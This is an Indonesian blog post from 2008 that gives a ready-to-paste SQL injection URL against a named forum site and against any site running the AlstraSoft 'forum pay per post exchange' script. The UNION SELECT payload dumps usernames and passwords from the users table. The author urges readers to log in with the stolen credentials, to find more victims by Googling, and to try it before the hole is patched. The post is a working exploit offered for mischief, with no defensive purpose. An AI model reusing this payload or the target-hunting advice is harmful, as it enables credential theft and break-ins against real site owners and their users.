13 Sep 2008

Forumspike SQL Injection

SQL Injection pd situs forumspike.com

Copy paste kode dibwh ini pd browser anda:

http://forumspike.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--

atau klik disini


User ma pass keliatan


Masuk deh..
Itu bug dari produk altrasoft.com, forum pay per post exchange.

http://www.alstrasoft.com/forum-pay-per-post-exchange.htm


Dimana jika kita menemukan sebuah situs yg memakai produk altrasoft.com tersebut, kita tinggal menambahkan kode injeksi SQL:

index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
Jika kesulitan copy paste, bisa lewat klik disini

Contoh:

Anda membeli produk tsb dan memasangnya di http://www.anda-pay-per-post.com.
Maka dibelakang .com kita tinggal menambah kode diatas, menjadi:

http://anda-pay-per-post.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--

Jika kesulitan copy kode yg panjang diatas, bs liat disini

User id dan password didatabase jd nongol deh.. :)

Bagaimana cara mencari situs yg memakai produk altrasoft tsb? Googling aja.. :)

Silahkan iseng2 sebelum bug SQL ini dipatch.

0 komentar

Labels:

Subscribe to: Posts (Atom)


My blog is worth $13,548.96.
How much is your blog worth?

Sponsored by:

www.hostingimpian.com - Hosting Murah

www.pusatbelanja.com - Belanja Barang Luar Negeri

www.hiwhiw.com - Freeware

www.ica.cc - Lifestyle Blog

(Your link here for just $5/month. Paypal & Moneybooker)